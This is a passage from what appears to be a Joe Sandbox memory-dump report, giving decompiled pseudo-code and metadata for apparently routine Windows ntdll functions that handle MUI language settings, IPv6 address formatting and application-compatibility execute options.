				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02218460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E021FE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0221718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02218460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0221718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02218460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02218460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02218460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0221718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E021F2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0220E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E021FE2A8(_t322,  &_v68, _v16);
								if(E02215553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0220E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E021FE2A8(_t322,  &_v68, _t236);
								if(E02215553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0221718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E021F2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0220E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E021FE2A8(_v12,  &_v68, _v16);
							if(E02215553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0220E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E021FE2A8(_t322,  &_v68, _t269);
							if(E02215553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0221718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E021FE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E021F2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0220E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E021FE2A8(_v12,  &_v68, _v16);
						if(E02215553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0220E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E021FE2A8(_t322,  &_v68, _t296);
						if(E02215553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E021FE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                    0x02218788
                                                    0x02218788
                                                    0x02218791
                                                    0x02218794
                                                    0x02218798
                                                    0x0221879b
                                                    0x0221879e
                                                    0x022187a1
                                                    0x022187a4
                                                    0x022187a7
                                                    0x022187aa
                                                    0x022187af
                                                    0x02261ad3
                                                    0x02218b0a
                                                    0x02218b0d
                                                    0x02218b13
                                                    0x02218b19
                                                    0x02218b1f
                                                    0x02218b25
                                                    0x02218b2b
                                                    0x02218b31
                                                    0x02218b37
                                                    0x02218b3d
                                                    0x02218b46
                                                    0x02218b46
                                                    0x022187c6
                                                    0x022187d0
                                                    0x02261ae0
                                                    0x02261ae6
                                                    0x02261af8
                                                    0x02261af8
                                                    0x02261afd
                                                    0x02261afe
                                                    0x02261b01
                                                    0x02261b06
                                                    0x02261b06
                                                    0x022187d6
                                                    0x022187f2
                                                    0x022187f7
                                                    0x02218807
                                                    0x0221880a
                                                    0x0221880f
                                                    0x02218810
                                                    0x02218813
                                                    0x02218818
                                                    0x02218818
                                                    0x0221882c
                                                    0x02218831
                                                    0x02218838
                                                    0x02218908
                                                    0x02218920
                                                    0x022189f0
                                                    0x02218a08
                                                    0x02218af6
                                                    0x02218af6
                                                    0x02218af8
                                                    0x02218afb
                                                    0x02261beb
                                                    0x02261beb
                                                    0x02218b04
                                                    0x02261bf8
                                                    0x02261c0e
                                                    0x02261c13
                                                    0x02261c16
                                                    0x02261c16
                                                    0x02261bf8
                                                    0x00000000
                                                    0x02218b04
                                                    0x02218a0e
                                                    0x02218a11
                                                    0x02218a14
                                                    0x02218a15
                                                    0x02218a18
                                                    0x02218a22
                                                    0x02218b59
                                                    0x02218a28
                                                    0x02218a3c
                                                    0x02218a3c
                                                    0x02218a42
                                                    0x02261bb0
                                                    0x02261b11
                                                    0x02261b11
                                                    0x00000000
                                                    0x02218a48
                                                    0x02218a51
                                                    0x02218a5b
                                                    0x02218a5e
                                                    0x02218a61
                                                    0x02218a69
                                                    0x02218a69
                                                    0x02218a6d
                                                    0x00000000
                                                    0x00000000
                                                    0x02218a74
                                                    0x02218a7c
                                                    0x02218a7d
                                                    0x02218a91
                                                    0x02218a93
                                                    0x02218a93
                                                    0x02218a98
                                                    0x02218a9b
                                                    0x02218aa1
                                                    0x02218aa1
                                                    0x02218aa4
                                                    0x02218aaa
                                                    0x02218ab1
                                                    0x02218ac5
                                                    0x02218ac7
                                                    0x02218ac7
                                                    0x02218ac5
                                                    0x02218ace
                                                    0x02261bc9
                                                    0x02261bce
                                                    0x02261bd2
                                                    0x02261bd2
                                                    0x02218ad8
                                                    0x02218aeb
                                                    0x02218aeb
                                                    0x02218af0
                                                    0x02218af4
                                                    0x00000000
                                                    0x02218af4
                                                    0x02218a42
                                                    0x02218926
                                                    0x02218929
                                                    0x0221892c
                                                    0x0221892d
                                                    0x02218930
                                                    0x02218935
                                                    0x0221893a
                                                    0x02218b51
                                                    0x02218940
                                                    0x02218954
                                                    0x02218954
                                                    0x0221895a
                                                    0x02261b63
                                                    0x00000000
                                                    0x02218960
                                                    0x02218969
                                                    0x02218973
                                                    0x02218976
                                                    0x02218979
                                                    0x0221897e
                                                    0x02218981
                                                    0x02218981
                                                    0x02218986
                                                    0x00000000
                                                    0x00000000
                                                    0x02261b6e
                                                    0x02261b74
                                                    0x02261b7b
                                                    0x02261b8f
                                                    0x02261b91
                                                    0x02261b91
                                                    0x02261b99
                                                    0x02261b9c
                                                    0x02261ba2
                                                    0x02261ba2
                                                    0x0221898c
                                                    0x02218992
                                                    0x02218999
                                                    0x022189ad
                                                    0x02261ba8
                                                    0x02261ba8
                                                    0x022189ad
                                                    0x022189b6
                                                    0x022189c8
                                                    0x022189cd
                                                    0x022189d0
                                                    0x022189d0
                                                    0x022189d6
                                                    0x022189e8
                                                    0x022189e8
                                                    0x022189ed
                                                    0x00000000
                                                    0x022189ed
                                                    0x0221895a
                                                    0x0221883e
                                                    0x02218841
                                                    0x02218844
                                                    0x02218845
                                                    0x02218848
                                                    0x0221884d
                                                    0x02218852
                                                    0x02218b49
                                                    0x02218858
                                                    0x0221886c
                                                    0x0221886c
                                                    0x02218872
                                                    0x02261b0e
                                                    0x00000000
                                                    0x02218878
                                                    0x02218881
                                                    0x0221888b
                                                    0x0221888e
                                                    0x02218891
                                                    0x02218896
                                                    0x02218899
                                                    0x02218899
                                                    0x0221889e
                                                    0x00000000
                                                    0x00000000
                                                    0x02261b21
                                                    0x02261b27
                                                    0x02261b2e
                                                    0x02261b42
                                                    0x02261b44
                                                    0x02261b44
                                                    0x02261b4c
                                                    0x02261b4f
                                                    0x02261b55
                                                    0x02261b55
                                                    0x022188a4
                                                    0x022188aa
                                                    0x022188b1
                                                    0x022188c5
                                                    0x02261b5b
                                                    0x02261b5b
                                                    0x022188c5
                                                    0x022188ce
                                                    0x022188e0
                                                    0x022188e5
                                                    0x022188e8
                                                    0x022188e8
                                                    0x022188ee
                                                    0x02218900
                                                    0x02218900
                                                    0x02218905
                                                    0x00000000
                                                    0x02218905

                                                    APIs
                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 022187C1
                                                    • Kernel-MUI-Language-Allowed, xrefs: 02218827
                                                    • Kernel-MUI-Number-Allowed, xrefs: 022187E6
                                                    • Kernel-MUI-Language-SKU, xrefs: 022189FC
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02218914
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: 391982db7b7b7cffe0ad27ef64ddd41e08541b03c8decb687979828bbae5aa37
                                                    • Instruction ID: 081e2711cba9e3fd3ebc08b77671ba76b006db1fbd8195768709f8776e35835e
                                                    • Opcode Fuzzy Hash: 391982db7b7b7cffe0ad27ef64ddd41e08541b03c8decb687979828bbae5aa37
                                                    • Instruction Fuzzy Hash: 14F103B2D1020AEFDB51DFD8C984DEEB7F9BB18304F10446AE605A7224E734AA51DF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022313CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E022313CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02227707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x21f2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02227707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x21f9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02227707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02227707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02227707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02227707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                    0x022313d5
                                                    0x022313d9
                                                    0x022313dc
                                                    0x022313de
                                                    0x022313e1
                                                    0x022313e8
                                                    0x022313ee
                                                    0x0225e8fd
                                                    0x00000000
                                                    0x0225e921
                                                    0x0225e921
                                                    0x0225e928
                                                    0x0225e982
                                                    0x0225e98a
                                                    0x00000000
                                                    0x0225e99a
                                                    0x0225e99e
                                                    0x0225e9a3
                                                    0x0225e9a8
                                                    0x0225e9b9
                                                    0x0225e978
                                                    0x00000000
                                                    0x0225e978
                                                    0x0225e98a
                                                    0x0225e92a
                                                    0x0225e931
                                                    0x0225e944
                                                    0x0225e944
                                                    0x0225e950
                                                    0x0225e954
                                                    0x0225e959
                                                    0x0225e95e
                                                    0x0225e963
                                                    0x0225e970
                                                    0x00000000
                                                    0x0225e975
                                                    0x0225e93b
                                                    0x0225e980
                                                    0x00000000
                                                    0x0225e980
                                                    0x0225e942
                                                    0x0225e94b
                                                    0x00000000
                                                    0x0225e94b
                                                    0x00000000
                                                    0x0225e942
                                                    0x022313f4
                                                    0x022313f4
                                                    0x022313f9
                                                    0x022313fc
                                                    0x022313ff
                                                    0x02231406
                                                    0x0225e9cc
                                                    0x0225e9d2
                                                    0x0225e9d2
                                                    0x0225e9cc
                                                    0x0223140c
                                                    0x02231411
                                                    0x02231431
                                                    0x0223143a
                                                    0x0223143c
                                                    0x0223143f
                                                    0x0223143f
                                                    0x02231442
                                                    0x02231447
                                                    0x022314a8
                                                    0x022314ac
                                                    0x0225e9e2
                                                    0x0225e9e7
                                                    0x0225e9ec
                                                    0x0225ea05
                                                    0x0225ea05
                                                    0x00000000
                                                    0x02231449
                                                    0x00000000
                                                    0x02231449
                                                    0x0223144c
                                                    0x02231459
                                                    0x02231462
                                                    0x02231469
                                                    0x0223146a
                                                    0x02231470
                                                    0x02231473
                                                    0x02231476
                                                    0x02231476
                                                    0x02231490
                                                    0x02231495
                                                    0x0223138e
                                                    0x02231390
                                                    0x02231397
                                                    0x02231398
                                                    0x02231399
                                                    0x022313a1
                                                    0x022313a4
                                                    0x022313a4
                                                    0x02231498
                                                    0x0223149c
                                                    0x0223149f
                                                    0x022314a2
                                                    0x00000000
                                                    0x00000000
                                                    0x022314a4
                                                    0x00000000
                                                    0x022314a4
                                                    0x02231413
                                                    0x02231415
                                                    0x02231416
                                                    0x02231419
                                                    0x0223141c
                                                    0x02231422
                                                    0x022313b7
                                                    0x022313bc
                                                    0x022313bf
                                                    0x022313bf
                                                    0x022313c2
                                                    0x02231424
                                                    0x02231424
                                                    0x02231424
                                                    0x02231427
                                                    0x0223142b
                                                    0x0223142c
                                                    0x0223142c
                                                    0x0223142c
                                                    0x00000000
                                                    0x0223141c
                                                    0x02231411

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: e5fe611ad36e1bd9c37e4cb1bcf0a59273f8d24245f7c79ac98ef5e3bc4ab2d5
                                                    • Instruction ID: 631dd630a75fab7537ac6a9a10135f52846147483b819f0065db32a4f8a182a5
                                                    • Opcode Fuzzy Hash: e5fe611ad36e1bd9c37e4cb1bcf0a59273f8d24245f7c79ac98ef5e3bc4ab2d5
                                                    • Instruction Fuzzy Hash: 546158B1D24756AACF35DFD9C8809BEBBB5EF84310714C02DEAEA47548D371A650CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02227EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E02227EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x22d2088; // 0x7634c1a7
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02227F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02243F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E021FDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x22d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02243F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02200D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02243F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02208375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02243F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0226E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02243F92();
					_t38 = 1;
					L2:
					return E021FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                    0x02227f08
                                                    0x02227f0f
                                                    0x02227f12
                                                    0x02227f1b
                                                    0x02227f31
                                                    0x02243ead
                                                    0x02243eb4
                                                    0x00000000
                                                    0x00000000
                                                    0x02243eba
                                                    0x02243ecd
                                                    0x02243ed2
                                                    0x02243ee1
                                                    0x02243ee7
                                                    0x02243eec
                                                    0x02243f12
                                                    0x02243f18
                                                    0x02243f1a
                                                    0x00000000
                                                    0x00000000
                                                    0x02243f20
                                                    0x02243f26
                                                    0x02243f28
                                                    0x00000000
                                                    0x00000000
                                                    0x02243f2e
                                                    0x02243f30
                                                    0x00000000
                                                    0x00000000
                                                    0x02243f3a
                                                    0x02243f3b
                                                    0x02243f53
                                                    0x02243f64
                                                    0x02243f69
                                                    0x02243f6c
                                                    0x02243f6d
                                                    0x02243f6f
                                                    0x0224e304
                                                    0x0224e30f
                                                    0x0224e315
                                                    0x0224e31e
                                                    0x0224e321
                                                    0x0224e327
                                                    0x0224e329
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0224e32f
                                                    0x0224e32f
                                                    0x0224e337
                                                    0x0224e33a
                                                    0x0224e33b
                                                    0x0224e33d
                                                    0x0224e33f
                                                    0x0224e341
                                                    0x0224e341
                                                    0x0224e34e
                                                    0x0224e353
                                                    0x0224e358
                                                    0x0224e35d
                                                    0x0224e35f
                                                    0x00000000
                                                    0x00000000
                                                    0x0224e365
                                                    0x0224e365
                                                    0x0224e368
                                                    0x0224e36e
                                                    0x00000000
                                                    0x00000000
                                                    0x0224e374
                                                    0x0224e32f
                                                    0x02243f75
                                                    0x02243f7a
                                                    0x02243f7c
                                                    0x02243f7e
                                                    0x02243f86
                                                    0x02227f39
                                                    0x02227f47
                                                    0x02227f47
                                                    0x02227f37
                                                    0x02227f37
                                                    0x00000000

                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02243F12
                                                    Strings
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02243F4A
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0224E345
                                                    • Execute=1, xrefs: 02243F5E
                                                    • ExecuteOptions, xrefs: 02243F04
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0224E2FB
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02243F75
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02243EC4
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
